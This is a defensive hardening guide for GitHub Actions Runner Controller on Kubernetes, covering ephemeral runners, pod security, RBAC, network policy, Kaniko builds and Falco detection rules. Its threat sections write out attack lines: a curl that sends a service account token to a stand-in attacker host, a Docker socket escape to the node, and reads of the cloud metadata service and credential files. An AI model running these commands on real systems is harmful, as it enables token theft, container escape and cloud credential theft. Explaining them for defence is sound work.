GitHub Actions Runner Controller Security: Ephemeral Runners and Pod Isolation in Kubernetes

GitHub Actions Runner Controller Security: Ephemeral Runners and Pod Isolation in Kubernetes

The Problem

GitHub Actions Runner Controller is a Kubernetes operator that watches the GitHub API for queued workflow jobs and provisions runner pods on-demand. Each pod registers with GitHub as a self-hosted runner, receives job assignments, executes the workflow steps defined in the repository’s .github/workflows/ files, reports results back, and is — in the default installation — left running to accept the next job. That last part is the critical failure.

CI code is arbitrary. Any developer with permission to open a pull request can insert workflow steps that execute on the runner pod. Any dependency — a Node package, a Go module, a PyPI library — that is fetched and executed during the build also runs on the runner pod. When that pod lives in your Kubernetes cluster, the threat surface extends well beyond the CI pipeline:

What ARC actually creates: An AutoscalingRunnerSet instructs the ARC controller to create runner pods in a specified namespace. The controller is a Kubernetes Deployment that holds a service account with the RBAC permissions needed to create and delete pods, manage secrets, and coordinate runner registration. The runner pods it creates are regular Kubernetes pods in your cluster. They share the kernel with every other pod on the same node. They can reach any endpoint that the cluster’s network policy permits.

The persistent runner problem: By default, ARC runner pods are not ephemeral. After completing a job, the runner re-registers with GitHub and waits for the next assignment. A malicious workflow step that writes a backdoor to the runner’s filesystem, installs a cron job inside the container, or modifies the runner binary affects every subsequent job on that pod. Worse: the runner’s work directory retains artifacts from previous jobs. A workflow that reads ./_work/ may access environment variables, credentials, or code artifacts belonging to a different workflow that ran before it on the same pod.

The service account inheritance problem: The ARC controller service account requires substantial Kubernetes API access — it needs to create and delete pods, read and write secrets for GitHub registration tokens, and manage the runner lifecycle. When this service account is assigned to runner pods (which happens when the AutoscalingRunnerSet is misconfigured or uses default values), a workflow step can read /var/run/secrets/kubernetes.io/serviceaccount/token and make API calls against the Kubernetes control plane with whatever permissions the controller service account holds.

The concrete attack paths:

A developer on your team opens a PR containing a build step that runs curl -s http://$(cat /var/run/secrets/kubernetes.io/serviceaccount/token | jq -r .sub).attacker.com/$(cat /var/run/secrets/kubernetes.io/serviceaccount/token). The GitHub Actions workflow triggers on pull request. The runner pod executes this step. If the pod has a service account token mounted, the token is exfiltrated before the PR is reviewed or merged. The attacker now has a Kubernetes API token — depending on the controller’s RBAC, this may provide pod creation, secret read access, or cluster-admin equivalent. The PR can be closed immediately; the token is already gone.

A different attack path: the ARC runner pod is configured with a mounted Docker socket for builds that require Docker. A workflow step runs docker run --privileged --pid=host --net=host -v /:/host alpine chroot /host sh — standard Docker socket escape. The workflow now has root on the Kubernetes node. From the node, it can read the kubelet’s credentials, access secrets mounted into other pods via the host filesystem at /var/lib/kubelet/pods/, and potentially pivot to the control plane.

A third path: the runner is not ephemeral. A previous job on this runner ran a deployment workflow that mounted AWS_DEPLOY_ROLE_ARN as an environment variable. The environment variable is gone — but shell history, cached AWS CLI credentials under ~/.aws/, and any artifacts written to the work directory remain. The next job, triggered by a different workflow, can read ~/.aws/credentials and exfiltrate production cloud access.

None of these require an external attacker. Any developer with PR access can execute these paths. The Kubernetes cluster running your CI pipeline is an attractive target precisely because CI pipelines routinely hold credentials to everywhere else: registries, cloud environments, secret managers, other clusters.

Threat Model

  • Node credential access via /proc: A runner pod without seccomp restrictions can read /proc/<kubelet-pid>/environ. The kubelet process environment contains configuration that may include bootstrap tokens or endpoint credentials. With node-level access, enumeration of secret material mounted into other pods becomes straightforward via the host filesystem.
  • Docker socket escape: An ARC configuration that mounts /var/run/docker.sock to support Docker-in-Docker gives any workflow step host-level access. A docker run --privileged call from within the runner escapes the pod boundary entirely.
  • Service account token abuse: Runner pods that inherit the ARC controller’s service account, or any service account with meaningful RBAC, expose Kubernetes API access to every workflow step. The token is auto-mounted at a predictable path and readable by any process in the pod.
  • Cross-job secret leakage on persistent runners: A non-ephemeral runner retains filesystem state between jobs. Cloud CLI credential caches, shell history, git credentials, and work-directory artifacts from one job are readable by subsequent jobs — potentially from different repositories or teams if the runner is shared.
  • ARC controller RBAC over-grant: The controller requires cluster-scoped RBAC to manage pods and secrets. If that RBAC is applied to runner pods instead of only to the controller, any compromised workflow can enumerate and access cluster resources at the controller’s privilege level.

Hardening Configuration

1. Ephemeral Runners: One Pod Per Job

The most important configuration is also the simplest: configure runners as ephemeral. An ephemeral runner registers with GitHub, executes exactly one job, deregisters, and terminates. The pod is deleted. The next job gets a new pod with a clean filesystem, no residual credentials, and no history from previous jobs.

ARC’s AutoscalingRunnerSet resource controls this. The minRunners: 0 and maxRunners combination allows scale-to-zero. The runner image handles ephemeral behaviour via the RUNNER_EPHEMERAL environment variable — the runner process calls GitHub’s runner deregistration API after the job completes, then exits, which causes the pod to reach Completed state and be garbage collected by ARC.

apiVersion: actions.github.com/v1alpha1
kind: AutoscalingRunnerSet
metadata:
  name: arc-runner-set
  namespace: arc-runners
spec:
  githubConfigUrl: "https://github.com/myorg"
  githubConfigSecret: arc-github-secret

  # Scale to zero when no jobs are queued
  minRunners: 0
  maxRunners: 10

  template:
    spec:
      containers:
      - name: runner
        image: ghcr.io/actions/actions-runner:2.315.0@sha256:3e9b3a9e8f4b2c1d7a6f5e0b9c8d7a4f3e2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d
        env:
        - name: RUNNER_EPHEMERAL
          value: "true"
        # Explicit: runner exits after one job
        # ARC detects the completed pod and deletes it
        # Next job queued → new pod created from clean image

Pinning the runner image to a digest rather than a tag applies the same supply-chain reasoning as SHA-pinning actions: the image pulled for each pod is cryptographically fixed to a specific layer set. A new runner image release does not automatically reach your pods until you update the digest reference and redeploy.

The trade-off is cold-start latency. Pod scheduling, image pull (if not cached on the node), and runner registration with GitHub’s API takes 30–60 seconds. For repositories where CI jobs are infrequent or where latency is acceptable, this is the correct trade-off. For repositories with very high job throughput, pre-warming a small pool (minRunners: 2) reduces median latency, but those pre-warmed runners should still be ephemeral — they register as ephemeral runners, execute one job, and are replaced by ARC before accepting another.

2. Runner Pod Security Standards

Runner pods need to write to their workspace — readOnlyRootFilesystem: true breaks most CI use cases because workflow steps write temporary files, install tools into the runner’s PATH, and populate the work directory. Everything else should be locked down.

apiVersion: actions.github.com/v1alpha1
kind: AutoscalingRunnerSet
metadata:
  name: arc-runner-set
  namespace: arc-runners
spec:
  githubConfigUrl: "https://github.com/myorg"
  githubConfigSecret: arc-github-secret
  minRunners: 0
  maxRunners: 10

  template:
    metadata:
      labels:
        app: arc-runner
        # Label used by NetworkPolicy and Falco selectors
    spec:
      # No host-level namespace sharing
      hostPID: false
      hostIPC: false
      hostNetwork: false

      # Runners do not need Kubernetes API access
      automountServiceAccountToken: false

      securityContext:
        runAsNonRoot: true
        runAsUser: 1001      # The 'runner' user in the actions-runner image
        runAsGroup: 1001
        fsGroup: 1001
        seccompProfile:
          type: RuntimeDefault
        # RuntimeDefault seccomp blocks ~40 syscalls the runner never needs,
        # including ptrace (used in process injection), mount (used in
        # container escape attempts), and kexec_load.

      containers:
      - name: runner
        image: ghcr.io/actions/actions-runner:2.315.0@sha256:3e9b3a9e8f4b2c1d7a6f5e0b9c8d7a4f3e2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d
        env:
        - name: RUNNER_EPHEMERAL
          value: "true"
        securityContext:
          allowPrivilegeEscalation: false
          readOnlyRootFilesystem: false  # Required: runner writes to /home/runner
          capabilities:
            drop: ["ALL"]
          # No capabilities added back — runner doesn't need NET_ADMIN,
          # SYS_PTRACE, SYS_ADMIN, or anything else from the default set

        resources:
          requests:
            cpu: "500m"
            memory: "512Mi"
          limits:
            cpu: "2"
            memory: "4Gi"

        volumeMounts:
        - name: work
          mountPath: /home/runner/_work
        # No hostPath mounts
        # No Docker socket mount

      volumes:
      - name: work
        emptyDir: {}
        # emptyDir is pod-scoped: created when pod starts, deleted when pod
        # terminates. No data persists between jobs.

      # No tolerations for tainted nodes unless runners are on dedicated nodes

The automountServiceAccountToken: false line is the most operationally important field after ephemerality. It prevents the Kubernetes API token from appearing at /var/run/secrets/kubernetes.io/serviceaccount/token. A workflow step that calls curl https://kubernetes.default.svc/api/v1/secrets -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" receives a connection refused or empty response rather than a valid credential.

Apply the restricted Pod Security Standard to the arc-runners namespace:

apiVersion: v1
kind: Namespace
metadata:
  name: arc-runners
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/audit: restricted

The restricted PSS enforces runAsNonRoot, allowPrivilegeEscalation: false, capabilities.drop: ALL, and requires either RuntimeDefault or a named seccomp profile. ARC pods that do not meet these requirements are rejected at admission. The label applies enforcement to all pods in the namespace, not just runner pods — this also constrains any misconfigured ARC controller component that lands in the wrong namespace.

3. Separate Service Accounts: Controller vs. Runner

The ARC controller service account requires meaningful Kubernetes API access. Runner pods require none. These must be separate accounts, and runner pods must explicitly reference the no-permission account.

# Controller service account — narrow RBAC, stays in arc-system namespace
apiVersion: v1
kind: ServiceAccount
metadata:
  name: arc-controller
  namespace: arc-system
---
# Runner service account — no token, no RBAC
apiVersion: v1
kind: ServiceAccount
metadata:
  name: arc-runner
  namespace: arc-runners
automountServiceAccountToken: false
---
# Minimal RBAC for the controller — only what ARC actually needs
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: arc-controller
  namespace: arc-runners
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "watch", "create", "delete"]
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["get", "list", "watch", "create", "update", "delete"]
  # Secrets access is scoped to arc-runners namespace only
- apiGroups: ["actions.github.com"]
  resources: ["ephemeralrunners", "ephemeralrunnersets"]
  verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: arc-controller
  namespace: arc-runners
subjects:
- kind: ServiceAccount
  name: arc-controller
  namespace: arc-system
roleRef:
  kind: Role
  name: arc-controller
  apiGroup: rbac.authorization.k8s.io

In the AutoscalingRunnerSet, explicitly reference the runner service account:

spec:
  template:
    spec:
      serviceAccountName: arc-runner
      automountServiceAccountToken: false
      # Both fields: serviceAccountName prevents inheriting the default SA,
      # automountServiceAccountToken: false prevents token mounting even if
      # the SA has tokens defined.

The default service account in any namespace has no RBAC, but it does have a token auto-mounted unless the namespace default is changed. Setting both fields eliminates the auto-mount regardless of namespace-level defaults.

4. Network Policy: Isolate Runner Pods from Internal Cluster Services

Runner pods have legitimate network needs: they must reach api.github.com to register and report job results, objects.githubusercontent.com and pipelines.actions.githubusercontent.com to download action code and receive job payloads, and any container registry your workflows pull from. They do not need to reach the Kubernetes API server, etcd, internal cluster services, or the cloud instance metadata endpoint (IMDS).

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: arc-runner-isolation
  namespace: arc-runners
spec:
  podSelector:
    matchLabels:
      app: arc-runner
  policyTypes:
  - Ingress
  - Egress

  # No ingress: runners initiate outbound connections only.
  # GitHub pushes job assignments via a long-poll from the runner process —
  # no inbound connections required.
  ingress: []

  egress:
  # DNS: required for GitHub hostname resolution
  - to:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: kube-system
    ports:
    - port: 53
      protocol: UDP
    - port: 53
      protocol: TCP

  # HTTPS: GitHub API and Actions infrastructure
  # In environments with an egress proxy, restrict to the proxy IP instead
  - ports:
    - port: 443
      protocol: TCP
    to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        # Block cloud IMDS endpoints — no runner needs instance metadata
        - 169.254.169.254/32  # AWS / Azure IMDS
        - 169.254.170.2/32    # ECS task metadata
        # Block Kubernetes API server — runners don't need cluster API access
        # Replace with your actual API server CIDR
        - 10.96.0.1/32        # kubernetes.default.svc ClusterIP (typical)
        # Block internal pod CIDRs — runners shouldn't reach other pods
        - 10.244.0.0/16       # Pod CIDR (adjust to your cluster's pod CIDR)
        - 10.96.0.0/12        # Service CIDR (adjust to your cluster's service CIDR)

The IMDS block is particularly important in cloud environments. AWS, Azure, and GCP instance metadata services are reachable at link-local addresses from any pod on the node unless explicitly blocked. A workflow step that curls http://169.254.169.254/latest/meta-data/iam/security-credentials/ retrieves the node’s attached IAM role credentials without any authentication. In EKS clusters, this is how a compromised runner pod can obtain IAM credentials scoped to the node’s instance profile — potentially with permissions far beyond what the CI pipeline needs.

The NetworkPolicy requires a CNI plugin that enforces it: Calico, Cilium, Weave Net, or similar. The default Kubernetes networking does not enforce NetworkPolicy objects. Verify enforcement is active before relying on this control:

# Create a test pod in arc-runners, attempt to reach the API server
kubectl run netpol-test \
  --image=alpine --restart=Never \
  --namespace=arc-runners \
  --labels="app=arc-runner" \
  -- sh -c "wget -qO- https://kubernetes.default.svc/api/v1 && echo REACHABLE || echo BLOCKED"

# Expected output with enforcement: BLOCKED (connection refused or timeout)
# Output without enforcement: REACHABLE (returns JSON API response)

5. Build Container Images Without the Docker Socket

The most common justification for mounting the Docker socket into runner pods is image builds. The Docker socket mount is a host-escape vector. The alternative is daemonless image building tools that run entirely in userspace within the container.

Kaniko builds Docker images from a Dockerfile without requiring daemon access or elevated privileges:

# .github/workflows/build.yml
jobs:
  build:
    runs-on: arc-runner-set
    steps:
    - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11

    - name: Build and push with Kaniko
      run: |
        /kaniko/executor \
          --dockerfile="${GITHUB_WORKSPACE}/Dockerfile" \
          --context="dir://${GITHUB_WORKSPACE}" \
          --destination="${REGISTRY}/${IMAGE_NAME}:${GITHUB_SHA}" \
          --cache=true \
          --cache-repo="${REGISTRY}/${IMAGE_NAME}/cache"
      env:
        REGISTRY: ghcr.io/myorg
        IMAGE_NAME: myapp

For Kaniko to be available in the runner pod, either use a runner image that includes the Kaniko executor, or use ARC’s container mode where the Kaniko step runs in a sidecar container:

# AutoscalingRunnerSet with Kaniko as an init container or sidecar
spec:
  template:
    spec:
      initContainers:
      - name: kaniko-setup
        image: gcr.io/kaniko-project/executor:v1.21.0@sha256:...
        command: ["cp", "/kaniko/executor", "/shared/kaniko"]
        volumeMounts:
        - name: shared-tools
          mountPath: /shared

      containers:
      - name: runner
        # ... runner config ...
        volumeMounts:
        - name: shared-tools
          mountPath: /usr/local/bin
          # Kaniko executor available as /usr/local/bin/kaniko

      volumes:
      - name: shared-tools
        emptyDir: {}

Buildah is an alternative that also supports rootless operation. Both tools write to OCI-compliant registries directly, skipping the Docker daemon entirely. Neither requires --privileged, neither requires host filesystem mounts, and neither provides an escape path from the runner pod boundary.

6. Detect Suspicious Runner Activity with Falco

Runtime detection provides a second line of defence when a misconfiguration slips through or when a new attack technique bypasses preventive controls. Falco runs as a DaemonSet and monitors syscall activity from every pod on the node.

# falco-rules-arc.yaml — deploy via ConfigMap into Falco's rules directory
customRules:
  arc-runner-rules.yaml: |-

    # Runner reads host-level credential paths
    - rule: ARC runner accessing host credential paths
      desc: >
        A GitHub Actions runner pod is reading paths associated with
        node-level credentials. This may indicate an attempt to read
        kubelet credentials or other node secret material.
      condition: >
        container.label.app = "arc-runner" and
        open_read and
        (fd.name startswith "/proc/" or
         fd.name startswith "/var/lib/kubelet/" or
         fd.name startswith "/etc/kubernetes/" or
         fd.name contains "/serviceaccount/token")
      output: >
        ARC runner reading host credential path
        (pod=%k8s.pod.name ns=%k8s.ns.name path=%fd.name
         user=%user.name cmd=%proc.cmdline)
      priority: CRITICAL
      tags: [arc, runner, credential-access]

    # Runner executes kubectl — API server contact attempt
    - rule: ARC runner executing kubectl
      desc: >
        kubectl execution inside a runner pod indicates an attempt to
        interact with the Kubernetes API. Runners should have no cluster
        API access; this is anomalous in all cases.
      condition: >
        container.label.app = "arc-runner" and
        spawned_process and
        (proc.name = "kubectl" or
         proc.name = "helm" or
         proc.name = "k9s" or
         proc.name = "kustomize")
      output: >
        Kubernetes tooling executed in ARC runner pod
        (pod=%k8s.pod.name cmd=%proc.cmdline user=%user.name)
      priority: WARNING
      tags: [arc, runner, lateral-movement]

    # Runner spawns shell from non-runner parent — post-compromise persistence
    - rule: ARC runner unexpected shell spawn
      desc: >
        A shell process is spawned with an unexpected parent process inside
        a runner pod. The runner process legitimately spawns shells to execute
        workflow steps; a shell spawned from curl, wget, or python suggests
        code execution from a fetched payload.
      condition: >
        container.label.app = "arc-runner" and
        spawned_process and
        proc.name in (shell_binaries) and
        proc.pname in (curl, wget, python, python3, node, ruby) and
        not proc.pname = "Runner.Worker"
      output: >
        Unexpected shell spawn in ARC runner pod
        (pod=%k8s.pod.name shell=%proc.name parent=%proc.pname
         cmd=%proc.cmdline)
      priority: HIGH
      tags: [arc, runner, execution]

    # Runner attempts outbound connection to non-standard port
    - rule: ARC runner non-HTTPS outbound connection
      desc: >
        A runner pod is initiating a network connection on a port other
        than 443 or 53. Legitimate runner activity (GitHub API, registry
        pulls, package downloads) uses HTTPS. Non-443 outbound connections
        from runner pods warrant investigation.
      condition: >
        container.label.app = "arc-runner" and
        outbound and
        fd.sport != 443 and
        fd.sport != 53 and
        fd.sport != 80
      output: >
        ARC runner non-standard outbound connection
        (pod=%k8s.pod.name dstip=%fd.rip dstport=%fd.rport
         cmd=%proc.cmdline)
      priority: NOTICE
      tags: [arc, runner, network]

Deploy Falco in kernel module or eBPF mode. The rules above use label selectors (container.label.app = "arc-runner") to scope detection to runner pods without generating noise from other workloads. Alert the CRITICAL and HIGH priority rules to your incident response channel; route WARNING and NOTICE to a monitoring queue for daily review.

Expected Behaviour

Watching the runner pod lifecycle with kubectl get pods -n arc-runners -w for an ephemeral runner set:

NAME                          READY   STATUS    RESTARTS   AGE
arc-runner-set-rg9k4-runner   0/1     Pending   0          0s
arc-runner-set-rg9k4-runner   0/1     Init:0/1  0          2s
arc-runner-set-rg9k4-runner   1/1     Running   0          8s
# Job executes for ~45 seconds
arc-runner-set-rg9k4-runner   0/1     Completed 0          53s
arc-runner-set-rg9k4-runner   0/1     Terminating 0        54s
# Pod deleted; next job queued → new pod with new name
arc-runner-set-rg9k5-runner   0/1     Pending   0          61s

Each pod name includes a random suffix: rg9k4, rg9k5. Each start from a clean image pull. The emptyDir volume that held the previous job’s workspace is gone with the pod.

A workflow step that attempts to reach the Kubernetes API server from a runner pod with the network policy applied:

# Inside a workflow step:
curl -sk https://kubernetes.default.svc/api/v1/namespaces \
  -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null || echo 'no-token')"

# Result with automountServiceAccountToken: false and NetworkPolicy enforced:
# cat: /run/secrets/kubernetes.io/serviceaccount/token: No such file or directory
# curl: (6) Could not resolve host: kubernetes.default.svc
# (or connection timeout, depending on CNI implementation)

A workflow step that runs cat /proc/1/environ triggers the Falco rule ARC runner accessing host credential paths within milliseconds. The alert appears in your SIEM or alerting channel. The workflow step itself still completes — Falco is a detection tool, not an enforcement tool unless paired with a kill signal configured in falco.yaml. For enforcement, pair with a Kubernetes admission webhook that blocks the pod if it attempts to modify its own seccomp profile, or with Tetragon which can terminate the process directly.

Trade-offs

Ephemeral runner cold-start latency: Pod scheduling, image pull, and GitHub runner registration takes 30–60 seconds on a warm node with a cached image. For repositories where jobs queue frequently, this latency is the primary operational complaint. Mitigations: pre-pull the runner image via a DaemonSet on dedicated runner nodes, use minRunners: 2 for a standing pool of ephemeral runners (they each register and wait for exactly one job before terminating), and place runner nodes in the same availability zone as the scheduler. The latency is a fixed cost. The alternative — persistent runners — trades 45 seconds of startup time for the entire attack surface described above.

No Docker socket, no easy Docker builds: Some CI workflows have hard dependencies on Docker daemon features: multi-platform builds via docker buildx, BuildKit cache mounts, or legacy docker-compose test setups. Kaniko covers the common case (Dockerfile to registry) but does not support all BuildKit features. Buildah covers more of the OCI build surface. For multi-platform builds, Kaniko supports --custom-platform; for cache mounts, the runner pod can be configured with a persistent volume claim for the Kaniko layer cache rather than using BuildKit’s cache mount syntax. The migration cost is real but bounded — most CI image builds reduce to FROM, COPY, RUN, CMD and work unchanged with Kaniko.

readOnlyRootFilesystem: false: Most container security guidance recommends readOnlyRootFilesystem: true. Runner pods cannot function with this set — workflow steps install tools, write temporary files, and populate the work directory under /home/runner/. This is a legitimate exception driven by the runner’s operational requirements. The compensating controls are: runAsNonRoot: true (the runner user cannot write to paths owned by root), capabilities: drop: ALL (the runner user cannot escalate or change file ownership), and the emptyDir workspace that is destroyed with the pod.

NetworkPolicy except blocks are fragile: The ipBlock.except syntax requires knowing your API server’s ClusterIP, pod CIDR, and service CIDR. These values differ between clusters and may change if the cluster is rebuilt. A more robust approach for clusters with Cilium: use CiliumNetworkPolicy with toFQDN rules that explicitly name the allowed GitHub endpoints rather than using IP block exceptions. This is more maintainable and more precise, but introduces a Cilium dependency.

Failure Modes

Persistent runners left as the default: The ARC Helm chart defaults and quick-start documentation focus on getting runners working, not on making them ephemeral. Teams that deploy ARC from the default chart without setting RUNNER_EPHEMERAL: "true" run persistent runners indefinitely. A malicious workflow step that writes to ~/.bashrc, installs a cron job inside the container, or modifies /home/runner/run.sh persists across jobs until the pod is manually deleted or the node is recycled. Ephemeral runners should be treated as a deployment prerequisite, not an optional optimisation.

Inheriting the controller service account: If the AutoscalingRunnerSet does not specify serviceAccountName: arc-runner in its pod template, Kubernetes assigns the default service account of the arc-runners namespace. If the arc-system namespace and arc-runners namespace are the same (a common shortcut in quick-start deployments), the runner pods may inherit the controller’s service account. The controller’s service account has permission to create pods, read secrets, and manage runners — exactly the permissions a compromised runner needs to escalate within the cluster. Verify: kubectl get pods -n arc-runners -o jsonpath='{.items[*].spec.serviceAccountName}' should return arc-runner (the restricted account), not arc-controller or default.

NetworkPolicy without CNI enforcement: Creating a NetworkPolicy object in a cluster running a CNI plugin that does not enforce it produces no security effect whatsoever. The object is accepted by the API server and stored in etcd but never applied to iptables or eBPF rules. Flannel in its default configuration, for example, does not enforce NetworkPolicy. Calico, Cilium, and Weave Net do. Before relying on the network policy controls in this article, verify that your CNI enforces them: deploy a test pod with the runner labels and attempt to connect to the Kubernetes API server. If the connection succeeds, enforcement is not active.

Docker socket mount “just for one step”: The Docker socket mount is often added incrementally. A workflow needs to build an image; the platform engineer adds the socket mount “temporarily”; the runner pod becomes a permanent host-escape vector. There is no safe scoping of a Docker socket mount — any workflow step on that runner, not just the one that needs Docker, can use the socket. The correct solution is Kaniko or Buildah, not a scoped mount. If the Docker socket is present in any runner pod configuration, assume that any workflow on that runner has node-level access.

Falco rules with wrong label selectors: The Falco rules above select pods by container.label.app = "arc-runner". If the AutoscalingRunnerSet pod template does not include this label, the rules match nothing. After deploying the rules, verify with a test: run a workflow step that executes cat /proc/1/cmdline and confirm the Falco alert fires. Silence is not safety; silence may mean the rule selector does not match your runner pods.